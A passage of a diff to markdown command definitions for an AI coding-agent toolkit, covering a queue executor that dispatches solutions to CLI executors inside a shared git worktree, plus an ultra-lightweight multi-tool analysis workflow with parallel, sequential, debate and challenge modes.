Stops after Gemini planning, outputs:
```
Gemini Plan:
- Intent: search
- Dimensions: 2 (pattern-definitions, pattern-usages)
- Estimated iterations: 3
Continue with exploration? [Y/n]
```
## Related Commands
```bash
# After discovery, plan solutions
/issue:plan DBP-001-01,DBP-001-02
# View all discoveries
/issue:manage
# Standard perspective-based discovery
/issue:discover src/auth/** --perspectives=security,bug
```
## Best Practices
1. **Be Specific in Prompts**: More specific prompts lead to better Gemini planning
2. **Scope Appropriately**: Narrow scope for focused comparison, wider for audits
3. **Review the Plan First**: Run with `--plan-only` to inspect the Gemini exploration plan before long explorations (the plan is kept in memory, not written to a file)
4. **Use Standard Depth First**: Start with standard, go deep only if needed
5. **Combine with `/issue:discover`**: Use prompt-based for comparisons, perspective-based for audits

View File

@@ -1,7 +1,7 @@
---
name: execute
description: Execute queue with DAG-based parallel orchestration (one commit per solution)
argument-hint: "[--worktree [<existing-path>]] [--queue <queue-id>]"
argument-hint: "--queue <queue-id> [--worktree [<existing-path>]]"
allowed-tools: TodoWrite(*), Bash(*), Read(*), AskUserQuestion(*)
---
@@ -17,21 +17,64 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
- `done <id>` → update solution completion status
- No race conditions: status changes only via `done`
- **Executor handles all tasks within a solution sequentially**
- **Worktree isolation**: Each executor can work in its own git worktree
- **Single worktree for entire queue**: One worktree isolates ALL queue execution from the main workspace
## Queue ID Requirement (MANDATORY)
**Queue ID is REQUIRED.** You MUST specify which queue to execute via `--queue <queue-id>`.
### If Queue ID Not Provided
When `--queue` parameter is missing, you MUST:
1. **List available queues** by running:
```javascript
const result = Bash('ccw issue queue list --brief --json');
const index = JSON.parse(result);
```
2. **Display available queues** to user:
```
Available Queues:
ID Status Progress Issues
-----------------------------------------------------------
→ QUE-20251215-001 active 3/10 ISS-001, ISS-002
QUE-20251210-002 active 0/5 ISS-003
QUE-20251205-003 completed 8/8 ISS-004
```
3. **Stop and ask user** to specify which queue to execute:
```javascript
AskUserQuestion({
questions: [{
question: "Which queue would you like to execute?",
header: "Queue",
multiSelect: false,
options: index.queues
.filter(q => q.status === 'active')
.map(q => ({
label: q.id,
description: `${q.status}, ${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
}))
}]
})
```
4. **After user selection**, continue execution with the selected queue ID.
**DO NOT auto-select queues.** Explicit user confirmation is required to prevent accidentally executing the wrong queue.
## Usage
```bash
/issue:execute --queue QUE-xxx # Execute specific queue (REQUIRED)
/issue:execute --queue QUE-xxx --worktree # Execute in isolated worktree
/issue:execute --queue QUE-xxx --worktree /path/to/existing/worktree # Resume
```
**Parallelism**: Determined automatically by task dependency DAG (no manual control)
**Executor & Dry-run**: Selected via interactive prompt (AskUserQuestion)
**Worktree**: Creates ONE worktree for the entire queue execution (not per-solution)
**⭐ Recommended Executor**: **Codex** - Best for long-running autonomous work (2hr timeout), supports background execution and full write access
@@ -44,37 +87,101 @@ Minimal orchestrator that dispatches **solution IDs** to executors. Each executo
## Execution Flow
```
Phase 0: Validate Queue ID (REQUIRED)
├─ If --queue provided → use specified queue
├─ If --queue missing → list queues, prompt user to select
└─ Store QUEUE_ID for all subsequent commands
Phase 0.5 (if --worktree): Setup Queue Worktree
├─ Create ONE worktree for entire queue: .ccw/worktrees/queue-<timestamp>
├─ All subsequent execution happens in this worktree
└─ Main workspace remains clean and untouched
Phase 1: Get DAG & User Selection
├─ ccw issue queue dag --queue ${QUEUE_ID} → { parallel_batches: [["S-1","S-2"], ["S-3"]] }
└─ AskUserQuestion → executor type (codex|gemini|agent), dry-run mode, worktree mode
Phase 2: Dispatch Parallel Batch (DAG-driven)
├─ Parallelism determined by DAG (no manual limit)
├─ All executors work in the SAME worktree (or main if no worktree)
├─ For each solution ID in batch (parallel - all at once):
│ ├─ Executor calls: ccw issue detail <id> (READ-ONLY)
│ ├─ Executor gets FULL SOLUTION with all tasks
│ ├─ Executor implements all tasks sequentially (T1 → T2 → T3)
│ ├─ Executor tests + verifies each task
│ ├─ Executor commits ONCE per solution (with formatted summary)
│ └─ Executor calls: ccw issue done <id>
└─ Wait for batch completion
Phase 3: Next Batch (repeat Phase 2)
└─ ccw issue queue dag → check for newly-ready solutions
Phase 4 (if --worktree): Worktree Completion
├─ All batches complete → prompt for merge strategy
└─ Options: Create PR / Merge to main / Keep branch
```
## Implementation
### Phase 0: Validate Queue ID
```javascript
// Check if --queue was provided
let QUEUE_ID = args.queue;
if (!QUEUE_ID) {
// List available queues
const listResult = Bash('ccw issue queue list --brief --json').trim();
const index = JSON.parse(listResult);
if (index.queues.length === 0) {
console.log('No queues found. Use /issue:queue to create one first.');
return;
}
// Filter active queues only
const activeQueues = index.queues.filter(q => q.status === 'active');
if (activeQueues.length === 0) {
console.log('No active queues found.');
console.log('Available queues:', index.queues.map(q => `${q.id} (${q.status})`).join(', '));
return;
}
// Display and prompt user
console.log('\nAvailable Queues:');
console.log('ID'.padEnd(22) + 'Status'.padEnd(12) + 'Progress'.padEnd(12) + 'Issues');
console.log('-'.repeat(70));
for (const q of index.queues) {
const marker = q.id === index.active_queue_id ? '→ ' : ' ';
console.log(marker + q.id.padEnd(20) + q.status.padEnd(12) +
`${q.completed_solutions || 0}/${q.total_solutions || 0}`.padEnd(12) +
q.issue_ids.join(', '));
}
const answer = AskUserQuestion({
questions: [{
question: "Which queue would you like to execute?",
header: "Queue",
multiSelect: false,
options: activeQueues.map(q => ({
label: q.id,
description: `${q.completed_solutions || 0}/${q.total_solutions || 0} completed, Issues: ${q.issue_ids.join(', ')}`
}))
}]
});
QUEUE_ID = answer['Queue'];
}
console.log(`\n## Executing Queue: ${QUEUE_ID}\n`);
```
### Phase 1: Get DAG & User Selection
```javascript
// Get dependency graph and parallel batches (QUEUE_ID required)
const dagJson = Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim();
const dag = JSON.parse(dagJson);
if (dag.error || dag.ready_count === 0) {
@@ -115,12 +222,12 @@ const answer = AskUserQuestion({
]
},
{
question: 'Use git worktree for queue isolation?',
header: 'Worktree',
multiSelect: false,
options: [
{ label: 'Yes (Recommended)', description: 'Create ONE worktree for entire queue - main stays clean' },
{ label: 'No', description: 'Work directly in current directory' }
]
}
]
@@ -140,7 +247,7 @@ if (isDryRun) {
}
```
### Phase 0 & 2: Setup Queue Worktree & Dispatch
```javascript
// Parallelism determined by DAG - no manual limit
@@ -158,24 +265,40 @@ TodoWrite({
console.log(`\n### Executing Solutions (DAG batch 1): ${batch.join(', ')}`);
// Parse existing worktree path from args if provided
// Example: --worktree /path/to/existing/worktree
const existingWorktree = args.worktree && typeof args.worktree === 'string' ? args.worktree : null;
// Setup ONE worktree for entire queue (not per-solution)
let worktreePath = null;
let worktreeBranch = null;
if (useWorktree) {
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
const worktreeBase = `${repoRoot}/.ccw/worktrees`;
Bash(`mkdir -p "${worktreeBase}"`);
Bash('git worktree prune'); // Cleanup stale worktrees
if (existingWorktree) {
// Resume mode: Use existing worktree
worktreePath = existingWorktree;
worktreeBranch = Bash(`git -C "${worktreePath}" branch --show-current`).trim();
console.log(`Resuming in existing worktree: ${worktreePath} (branch: ${worktreeBranch})`);
} else {
// Create mode: ONE worktree for the entire queue
const timestamp = new Date().toISOString().replace(/[-:T]/g, '').slice(0, 14);
worktreeBranch = `queue-exec-${dag.queue_id || timestamp}`;
worktreePath = `${worktreeBase}/${worktreeBranch}`;
Bash(`git worktree add "${worktreePath}" -b "${worktreeBranch}"`);
console.log(`Created queue worktree: ${worktreePath}`);
}
}
// Launch ALL solutions in batch in parallel (DAG guarantees no conflicts)
// All executors work in the SAME worktree (or main if no worktree)
const executions = batch.map(solutionId => {
updateTodo(solutionId, 'in_progress');
return dispatchExecutor(solutionId, executor, worktreePath);
});
await Promise.all(executions);
@@ -185,126 +308,20 @@ batch.forEach(id => updateTodo(id, 'completed'));
### Executor Dispatch
```javascript
// worktreePath: path to shared worktree (null if not using worktree)
function dispatchExecutor(solutionId, executorType, worktreePath = null) {
// If worktree is provided, executor works in that directory
// No per-solution worktree creation - ONE worktree for entire queue
const cdCommand = worktreePath ? `cd "${worktreePath}"` : '';
const prompt = `
## Execute Solution ${solutionId}
${worktreePath ? `
### Step 0: Enter Queue Worktree
\`\`\`bash
cd "${worktreePath}"
\`\`\`
` : ''}
### Step 1: Get Solution (read-only)
\`\`\`bash
ccw issue detail ${solutionId}
@@ -352,16 +369,21 @@ If any task failed:
\`\`\`bash
ccw issue done ${solutionId} --fail --reason '{"task_id": "TX", "error_type": "test_failure", "message": "..."}'
\`\`\`
**Note**: Do NOT clean up the worktree after this solution. The worktree is shared by all solutions in the queue.
`;
// For CLI tools, pass --cd to set working directory
const cdOption = worktreePath ? ` --cd "${worktreePath}"` : '';
if (executorType === 'codex') {
return Bash(
`ccw cli -p "${escapePrompt(prompt)}" --tool codex --mode write --id exec-${solutionId}${cdOption}`,
{ timeout: 7200000, run_in_background: true } // 2hr for full solution
);
} else if (executorType === 'gemini') {
return Bash(
`ccw cli -p "${escapePrompt(prompt)}" --tool gemini --mode write --id exec-${solutionId}${cdOption}`,
{ timeout: 3600000, run_in_background: true }
);
} else {
@@ -369,7 +391,7 @@ ${worktreeCleanup}`;
subagent_type: 'code-developer',
run_in_background: false,
description: `Execute solution ${solutionId}`,
prompt: worktreePath ? `Working directory: ${worktreePath}\n\n${prompt}` : prompt
});
}
}
@@ -378,8 +400,8 @@ ${worktreeCleanup}`;
### Phase 3: Check Next Batch
```javascript
// Refresh DAG after batch completes (use same QUEUE_ID)
const refreshedDag = JSON.parse(Bash(`ccw issue queue dag --queue ${QUEUE_ID}`).trim());
console.log(`
## Batch Complete
@@ -389,46 +411,117 @@ console.log(`
`);
if (refreshedDag.ready_count > 0) {
console.log(`Run \`/issue:execute --queue ${QUEUE_ID}\` again for next batch.`);
// Note: If resuming, pass existing worktree path:
// /issue:execute --queue ${QUEUE_ID} --worktree <worktreePath>
}
```
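The dispatch commands interpolate the prompt into a double-quoted shell string via `escapePrompt`, which this document never defines. A minimal sketch, assuming only the characters that stay special inside double quotes (backslash, double quote, backtick, `$`) need escaping:

```javascript
// Hypothetical helper (assumed, not the command's actual implementation):
// backslash-escape the shell-special characters inside double quotes.
function escapePrompt(prompt) {
  return prompt.replace(/[\\"`$]/g, ch => '\\' + ch);
}

console.log(escapePrompt('Run `ccw issue detail "S-1"` for $QUEUE'));
```

Real prompts may also contain newlines; depending on the shell invocation, passing the prompt via a file or stdin would be more robust than escaping.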
### Phase 4: Worktree Completion (after ALL batches)
```javascript
// Only run when ALL solutions completed AND using worktree
if (useWorktree && refreshedDag.ready_count === 0 && refreshedDag.completed_count === refreshedDag.total) {
console.log('\n## All Solutions Completed - Worktree Cleanup');
const answer = AskUserQuestion({
questions: [{
question: `Queue complete. What to do with worktree branch "${worktreeBranch}"?`,
header: 'Merge',
multiSelect: false,
options: [
{ label: 'Create PR (Recommended)', description: 'Push branch and create pull request' },
{ label: 'Merge to main', description: 'Merge all commits and cleanup worktree' },
{ label: 'Keep branch', description: 'Cleanup worktree, keep branch for manual handling' }
]
}]
});
const repoRoot = Bash('git rev-parse --show-toplevel').trim();
if (answer['Merge'].includes('Create PR')) {
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution - all solutions completed" --head "${worktreeBranch}"`);
Bash(`git worktree remove "${worktreePath}"`);
console.log(`PR created for branch: ${worktreeBranch}`);
} else if (answer['Merge'].includes('Merge to main')) {
// Check main is clean
const mainDirty = Bash('git status --porcelain').trim();
if (mainDirty) {
console.log('Warning: Main has uncommitted changes. Falling back to PR.');
Bash(`git -C "${worktreePath}" push -u origin "${worktreeBranch}"`);
Bash(`gh pr create --title "Queue ${dag.queue_id}" --body "Issue queue execution (main had uncommitted changes)" --head "${worktreeBranch}"`);
} else {
Bash(`git merge --no-ff "${worktreeBranch}" -m "Merge queue ${dag.queue_id}"`);
Bash(`git branch -d "${worktreeBranch}"`);
}
Bash(`git worktree remove "${worktreePath}"`);
} else {
Bash(`git worktree remove "${worktreePath}"`);
console.log(`Branch ${worktreeBranch} kept for manual handling`);
}
}
```
## Parallel Execution Model
```
┌─────────────────────────────────────────────────────────────────┐
│ Orchestrator                                                    │
├─────────────────────────────────────────────────────────────────┤
│ 0.  Validate QUEUE_ID (required, or prompt user to select)      │
│ 0.5 (if --worktree) Create ONE worktree for entire queue        │
│     → .ccw/worktrees/queue-exec-<queue-id>                      │
│ 1.  ccw issue queue dag --queue ${QUEUE_ID}                     │
│     → { parallel_batches: [["S-1","S-2"], ["S-3"]] }            │
│ 2.  Dispatch batch 1 (parallel, SAME worktree):                 │
│     ┌────────────────────────────────────────────┐              │
│     │ Shared Queue Worktree (or main)            │              │
│     │ ┌──────────────────┐ ┌──────────────────┐  │              │
│     │ │ Executor 1       │ │ Executor 2       │  │              │
│     │ │ detail S-1       │ │ detail S-2       │  │              │
│     │ │ [T1→T2→T3]       │ │ [T1→T2]          │  │              │
│     │ │ commit S-1       │ │ commit S-2       │  │              │
│     │ │ done S-1         │ │ done S-2         │  │              │
│     │ └──────────────────┘ └──────────────────┘  │              │
│     └────────────────────────────────────────────┘              │
│ 3.  ccw issue queue dag (refresh)                               │
│     → S-3 now ready → dispatch batch 2 (same worktree)          │
│ 4.  (if --worktree) ALL batches complete → cleanup worktree     │
│     → Prompt: Create PR / Merge to main / Keep branch           │
└─────────────────────────────────────────────────────────────────┘
```
**Why this works for parallel:**
- **ONE worktree for entire queue** → all solutions share same isolated workspace
- `detail <id>` is READ-ONLY → no race conditions
- Each executor handles **all tasks within a solution** sequentially
- **One commit per solution** with formatted summary (not per-task)
- `done <id>` updates only its own solution status
- `queue dag` recalculates ready solutions after each batch
- Solutions in same batch have NO file conflicts (DAG guarantees)
- **Main workspace stays clean** until merge/PR decision
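The batches returned by `ccw issue queue dag` can be understood as topological layers of the solution dependency graph. A minimal sketch of that layering (assumed input shape and illustrative names, not the CLI's actual implementation):

```javascript
// deps maps each solution ID to the solution IDs it depends on.
// Each batch contains every not-yet-done solution whose prerequisites
// are all done; solutions in the same batch can run in parallel.
function parallelBatches(deps) {
  const ids = Object.keys(deps);
  const done = new Set();
  const batches = [];
  while (done.size < ids.length) {
    const ready = ids.filter(id =>
      !done.has(id) && (deps[id] || []).every(d => done.has(d)));
    if (ready.length === 0) throw new Error('Dependency cycle detected');
    batches.push(ready);
    ready.forEach(id => done.add(id));
  }
  return batches;
}

console.log(parallelBatches({ 'S-1': [], 'S-2': [], 'S-3': ['S-1'] }));
// → [ [ 'S-1', 'S-2' ], [ 'S-3' ] ]
```

This is why re-running `queue dag` after each batch surfaces newly ready solutions: completing a batch unblocks the next topological layer.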
## CLI Endpoint Contract
### `ccw issue queue list --brief --json`
Returns queue index for selection (used when --queue not provided):
```json
{
"active_queue_id": "QUE-20251215-001",
"queues": [
{ "id": "QUE-20251215-001", "status": "active", "issue_ids": ["ISS-001"], "total_solutions": 5, "completed_solutions": 2 }
]
}
```
### `ccw issue queue dag --queue <queue-id>`
Returns dependency graph with parallel batches (solution-level, **--queue required**):
```json
{
"queue_id": "QUE-...",

View File

@@ -311,6 +311,12 @@ Output:
└─ .workflow/.debug/DBG-{slug}-{date}/debug.log
```
## Post-Completion Expansion
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); each selected dimension invokes `/issue:new "{summary} - {dimension}"`
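The expansion step can be sketched as a small mapping from the user's selected dimensions to `/issue:new` invocations (the helper name is hypothetical; only the command shape comes from this document):

```javascript
// Build one /issue:new command per selected expansion dimension.
function expansionCommands(summary, dimensions) {
  return dimensions.map(d => `/issue:new "${summary} - ${d}"`);
}

console.log(expansionCommands('Fix login bug', ['test', 'doc']));
// → [ '/issue:new "Fix login bug - test"', '/issue:new "Fix login bug - doc"' ]
```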
---
## Error Handling
| Situation | Action |

View File

@@ -275,6 +275,10 @@ AskUserQuestion({
- **"Enter Review"**: Execute `/workflow:review`
- **"Complete Session"**: Execute `/workflow:session:complete`
### Post-Completion Expansion
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); each selected dimension invokes `/issue:new "{summary} - {dimension}"`
## Execution Strategy (IMPL_PLAN-Driven)
### Strategy Priority

View File

@@ -664,6 +664,10 @@ Collected after each execution call completes:
Appended to `previousExecutionResults` array for context continuity in multi-execution scenarios.
## Post-Completion Expansion
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); each selected dimension invokes `/issue:new "{summary} - {dimension}"`
**Fixed ID Pattern**: `${sessionId}-${groupId}` enables predictable lookup without auto-generated timestamps.
**Resume Usage**: If `status` is "partial" or "failed", use `fixedCliId` to resume:

View File

@@ -0,0 +1,433 @@
---
name: workflow:lite-lite-lite
description: Ultra-lightweight multi-tool analysis and direct execution. No artifacts, auto tool selection based on task analysis, user-driven iteration via AskUser.
argument-hint: "<task description>"
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), mcp__ace-tool__search_context(*)
---
# Ultra-Lite Multi-Tool Workflow
## Quick Start
```bash
/workflow:lite-lite-lite "Fix the login bug"
/workflow:lite-lite-lite "Refactor payment module for multi-gateway support"
```
**Core Philosophy**: Minimal friction, maximum velocity. No files, no artifacts - just analyze and execute.
## Overview
**Zero-artifact workflow**: Clarify → Select Tools → Multi-Mode Analysis → Decision → Direct Execution
**vs multi-cli-plan**: No IMPL_PLAN.md, plan.json, synthesis.json - all state in memory.
## Execution Flow
```
Phase 1: Clarify Requirements → AskUser for missing details
Phase 2: Select Tools (CLI → Mode → Agent) → 3-step selection
Phase 3: Multi-Mode Analysis → Execute with --resume chaining
Phase 4: User Decision → Execute / Refine / Change / Cancel
Phase 5: Direct Execution → No plan files, immediate implementation
```
## Phase 1: Clarify Requirements
```javascript
const taskDescription = $ARGUMENTS
if (taskDescription.length < 20 || isAmbiguous(taskDescription)) {
AskUserQuestion({
questions: [{
question: "Please provide more details: target files/modules, expected behavior, constraints?",
header: "Details",
options: [
{ label: "I'll provide more", description: "Add more context" },
{ label: "Continue analysis", description: "Let tools explore autonomously" }
],
multiSelect: false
}]
})
}
// Optional: Quick ACE Context for complex tasks
mcp__ace-tool__search_context({
project_root_path: process.cwd(),
query: `${taskDescription} implementation patterns`
})
```
## Phase 2: Select Tools
### Tool Definitions
**CLI Tools** (from cli-tools.json):
```javascript
const cliConfig = JSON.parse(Read("~/.claude/cli-tools.json"))
const cliTools = Object.entries(cliConfig.tools)
.filter(([_, config]) => config.enabled)
.map(([name, config]) => ({
name, type: 'cli',
tags: config.tags || [],
model: config.primaryModel,
toolType: config.type // builtin, cli-wrapper, api-endpoint
}))
```
**Sub Agents**:
| Agent | Strengths | canExecute |
|-------|-----------|------------|
| **code-developer** | Code implementation, test writing | ✅ |
| **Explore** | Fast code exploration, pattern discovery | ❌ |
| **cli-explore-agent** | Dual-source analysis (Bash+CLI) | ❌ |
| **cli-discuss-agent** | Multi-CLI collaboration, cross-verification | ❌ |
| **debug-explore-agent** | Hypothesis-driven debugging | ❌ |
| **context-search-agent** | Multi-layer file discovery, dependency analysis | ❌ |
| **test-fix-agent** | Test execution, failure diagnosis, code fixing | ✅ |
| **universal-executor** | General execution, multi-domain adaptation | ✅ |
**Analysis Modes**:
| Mode | Pattern | Use Case | minCLIs |
|------|---------|----------|---------|
| **Parallel** | `A \|\| B \|\| C → Aggregate` | Fast multi-perspective | 1+ |
| **Sequential** | `A → B(resume) → C(resume)` | Incremental deepening | 2+ |
| **Collaborative** | `A → B → A → B → Synthesize` | Multi-round refinement | 2+ |
| **Debate** | `A(propose) → B(challenge) → A(defend)` | Adversarial validation | 2 |
| **Challenge** | `A(analyze) → B(challenge)` | Find flaws and risks | 2 |
### Three-Step Selection Flow
```javascript
// Step 1: Select CLIs (multiSelect)
AskUserQuestion({
questions: [{
question: "Select CLI tools for analysis (1-3 for collaboration modes)",
header: "CLI Tools",
options: cliTools.map(cli => ({
label: cli.name,
description: cli.tags.length > 0 ? cli.tags.join(', ') : cli.model || 'general'
})),
multiSelect: true
}]
})
// Step 2: Select Mode (filtered by CLI count)
const availableModes = analysisModes.filter(m => selectedCLIs.length >= m.minCLIs)
AskUserQuestion({
questions: [{
question: "Select analysis mode",
header: "Mode",
options: availableModes.map(m => ({
label: m.label,
description: `${m.description} [${m.pattern}]`
})),
multiSelect: false
}]
})
// Step 3: Select Agent for execution
AskUserQuestion({
questions: [{
question: "Select Sub Agent for execution",
header: "Agent",
options: agents.map(a => ({ label: a.name, description: a.strength })),
multiSelect: false
}]
})
// Confirm selection
AskUserQuestion({
questions: [{
question: "Confirm selection?",
header: "Confirm",
options: [
{ label: "Confirm and continue", description: `${selectedMode.label} with ${selectedCLIs.length} CLIs` },
{ label: "Re-select CLIs", description: "Choose different CLI tools" },
{ label: "Re-select Mode", description: "Choose different analysis mode" },
{ label: "Re-select Agent", description: "Choose different Sub Agent" }
],
multiSelect: false
}]
})
```
## Phase 3: Multi-Mode Analysis
### Universal CLI Prompt Template
```javascript
// Unified prompt builder - used by all modes
function buildPrompt({ purpose, tasks, expected, rules, taskDescription }) {
return `
PURPOSE: ${purpose}: ${taskDescription}
TASK: ${tasks.join(' ')}
MODE: analysis
CONTEXT: @**/*
EXPECTED: ${expected}
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | ${rules}
`
}
// Execute CLI with prompt
function execCLI(cli, prompt, options = {}) {
const { resume, background = false } = options
const resumeFlag = resume ? `--resume ${resume}` : ''
return Bash({
command: `ccw cli -p "${prompt}" --tool ${cli.name} --mode analysis ${resumeFlag}`,
run_in_background: background
})
}
```
### Prompt Presets by Role
| Role | PURPOSE | TASKS | EXPECTED | RULES |
|------|---------|-------|----------|-------|
| **initial** | Initial analysis | Identify files, Analyze approach, List changes | Root cause, files, changes, risks | Focus on actionable insights |
| **extend** | Build on previous | Review previous, Extend, Add insights | Extended analysis building on findings | Build incrementally, avoid repetition |
| **synthesize** | Refine and synthesize | Review, Identify gaps, Synthesize | Refined synthesis with new perspectives | Add value not repetition |
| **propose** | Propose comprehensive analysis | Analyze thoroughly, Propose solution, State assumptions | Well-reasoned proposal with trade-offs | Be clear about assumptions |
| **challenge** | Challenge and stress-test | Identify weaknesses, Question assumptions, Suggest alternatives | Critique with counter-arguments | Be adversarial but constructive |
| **defend** | Respond to challenges | Address challenges, Defend valid aspects, Propose refined solution | Refined proposal incorporating feedback | Be open to criticism, synthesize |
| **criticize** | Find flaws ruthlessly | Find logical flaws, Identify edge cases, Rate criticisms | Critique with severity: [CRITICAL]/[HIGH]/[MEDIUM]/[LOW] | Be ruthlessly critical |
```javascript
const PROMPTS = {
initial: { purpose: 'Initial analysis', tasks: ['Identify affected files', 'Analyze implementation approach', 'List specific changes'], expected: 'Root cause, files to modify, key changes, risks', rules: 'Focus on actionable insights' },
extend: { purpose: 'Build on previous analysis', tasks: ['Review previous findings', 'Extend analysis', 'Add new insights'], expected: 'Extended analysis building on previous', rules: 'Build incrementally, avoid repetition' },
synthesize: { purpose: 'Refine and synthesize', tasks: ['Review previous', 'Identify gaps', 'Add insights', 'Synthesize findings'], expected: 'Refined synthesis with new perspectives', rules: 'Build collaboratively, add value' },
propose: { purpose: 'Propose comprehensive analysis', tasks: ['Analyze thoroughly', 'Propose solution', 'State assumptions clearly'], expected: 'Well-reasoned proposal with trade-offs', rules: 'Be clear about assumptions' },
challenge: { purpose: 'Challenge and stress-test', tasks: ['Identify weaknesses', 'Question assumptions', 'Suggest alternatives', 'Highlight overlooked risks'], expected: 'Constructive critique with counter-arguments', rules: 'Be adversarial but constructive' },
defend: { purpose: 'Respond to challenges', tasks: ['Address each challenge', 'Defend valid aspects', 'Acknowledge valid criticisms', 'Propose refined solution'], expected: 'Refined proposal incorporating alternatives', rules: 'Be open to criticism, synthesize best ideas' },
criticize: { purpose: 'Stress-test and find weaknesses', tasks: ['Find logical flaws', 'Identify missed edge cases', 'Propose alternatives', 'Rate criticisms (High/Medium/Low)'], expected: 'Detailed critique with severity ratings', rules: 'Be ruthlessly critical, find every flaw' }
}
```
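To make the template concrete, here is a self-contained rendering of the `initial` preset through the builder above; the `$(cat ...)` shell substitution in RULES is replaced with the plain rules string for illustration:

```javascript
// Local copy of the `initial` preset from the table above.
const PROMPTS = {
  initial: {
    purpose: 'Initial analysis',
    tasks: ['Identify affected files', 'Analyze implementation approach', 'List specific changes'],
    expected: 'Root cause, files to modify, key changes, risks',
    rules: 'Focus on actionable insights'
  }
};

// Simplified buildPrompt: same fields, no shell substitution.
function buildPrompt({ purpose, tasks, expected, rules, taskDescription }) {
  return [
    `PURPOSE: ${purpose}: ${taskDescription}`,
    `TASK: ${tasks.join(' ')}`,
    'MODE: analysis',
    'CONTEXT: @**/*',
    `EXPECTED: ${expected}`,
    `RULES: ${rules}`
  ].join('\n');
}

console.log(buildPrompt({ ...PROMPTS.initial, taskDescription: 'Fix the login bug' }));
```

The spread `{ ...PROMPTS.initial, taskDescription }` is what lets every mode reuse the same builder with a different preset.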
### Mode Implementations
```javascript
// Parallel: All CLIs run simultaneously
async function executeParallel(clis, task) {
return await Promise.all(clis.map(cli =>
execCLI(cli, buildPrompt({ ...PROMPTS.initial, taskDescription: task }), { background: true })
))
}
// Sequential: Each CLI builds on previous via --resume
async function executeSequential(clis, task) {
const results = []
let prevId = null
for (const cli of clis) {
const preset = prevId ? PROMPTS.extend : PROMPTS.initial
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
results.push(result)
prevId = extractSessionId(result)
}
return results
}
// Collaborative: Multi-round synthesis
async function executeCollaborative(clis, task, rounds = 2) {
const results = []
let prevId = null
for (let r = 0; r < rounds; r++) {
for (const cli of clis) {
const preset = !prevId ? PROMPTS.initial : PROMPTS.synthesize
const result = await execCLI(cli, buildPrompt({ ...preset, taskDescription: task }), { resume: prevId })
results.push({ cli: cli.name, round: r, result })
prevId = extractSessionId(result)
}
}
return results
}
// Debate: Propose → Challenge → Defend
async function executeDebate(clis, task) {
const [cliA, cliB] = clis
const results = []
const propose = await execCLI(cliA, buildPrompt({ ...PROMPTS.propose, taskDescription: task }))
results.push({ phase: 'propose', cli: cliA.name, result: propose })
const challenge = await execCLI(cliB, buildPrompt({ ...PROMPTS.challenge, taskDescription: task }), { resume: extractSessionId(propose) })
results.push({ phase: 'challenge', cli: cliB.name, result: challenge })
const defend = await execCLI(cliA, buildPrompt({ ...PROMPTS.defend, taskDescription: task }), { resume: extractSessionId(challenge) })
results.push({ phase: 'defend', cli: cliA.name, result: defend })
return results
}
// Challenge: Analyze → Criticize
async function executeChallenge(clis, task) {
const [cliA, cliB] = clis
const results = []
const analyze = await execCLI(cliA, buildPrompt({ ...PROMPTS.initial, taskDescription: task }))
results.push({ phase: 'analyze', cli: cliA.name, result: analyze })
const criticize = await execCLI(cliB, buildPrompt({ ...PROMPTS.criticize, taskDescription: task }), { resume: extractSessionId(analyze) })
results.push({ phase: 'challenge', cli: cliB.name, result: criticize })
return results
}
```
### Mode Router & Result Aggregation
```javascript
async function executeAnalysis(mode, clis, taskDescription) {
switch (mode.name) {
case 'parallel': return await executeParallel(clis, taskDescription)
case 'sequential': return await executeSequential(clis, taskDescription)
case 'collaborative': return await executeCollaborative(clis, taskDescription)
case 'debate': return await executeDebate(clis, taskDescription)
case 'challenge': return await executeChallenge(clis, taskDescription)
}
}
function aggregateResults(mode, results) {
const base = { mode: mode.name, pattern: mode.pattern, tools_used: results.map(r => r.cli || 'unknown') }
switch (mode.name) {
case 'parallel':
return { ...base, findings: results.map(parseOutput), consensus: findCommonPoints(results), divergences: findDifferences(results) }
case 'sequential':
return { ...base, evolution: results.map((r, i) => ({ step: i + 1, analysis: parseOutput(r) })), finalAnalysis: parseOutput(results.at(-1)) }
case 'collaborative':
return { ...base, rounds: groupByRound(results), synthesis: extractSynthesis(results.at(-1)) }
case 'debate':
return { ...base, proposal: parseOutput(results.find(r => r.phase === 'propose')?.result),
challenges: parseOutput(results.find(r => r.phase === 'challenge')?.result),
resolution: parseOutput(results.find(r => r.phase === 'defend')?.result), confidence: calculateDebateConfidence(results) }
case 'challenge':
return { ...base, originalAnalysis: parseOutput(results.find(r => r.phase === 'analyze')?.result),
critiques: parseCritiques(results.find(r => r.phase === 'challenge')?.result), riskScore: calculateRiskScore(results) }
}
}
```
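The helpers referenced above (`parseOutput`, `findCommonPoints`, `findDifferences`) are assumed to exist elsewhere. A minimal sketch of the two comparison helpers, under the assumption that each parsed result exposes a `findings` string array:

```javascript
// Hypothetical comparison helpers for parallel-mode aggregation.
// Assumes each result has already been parsed into { findings: string[] }.
const normalize = s => s.trim().toLowerCase()

function findCommonPoints(results, parse = r => r.findings) {
  // A point is "common" when every CLI reported it (after normalization)
  const sets = results.map(r => new Set(parse(r).map(normalize)))
  const [first, ...rest] = sets
  return [...first].filter(p => rest.every(s => s.has(p)))
}

function findDifferences(results, parse = r => r.findings) {
  // A point is a "divergence" when at least one CLI did not report it
  const counts = new Map()
  for (const r of results) {
    for (const p of new Set(parse(r).map(normalize))) {
      counts.set(p, (counts.get(p) || 0) + 1)
    }
  }
  return [...counts].filter(([, n]) => n < results.length).map(([p]) => p)
}
```

Real outputs would need fuzzier matching than exact string equality; this only illustrates the consensus/divergence split.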
## Phase 4: User Decision
```javascript
function presentSummary(analysis) {
console.log(`## Analysis Result\n**Mode**: ${analysis.mode} (${analysis.pattern})\n**Tools**: ${analysis.tools_used.join(' → ')}`)
switch (analysis.mode) {
case 'parallel':
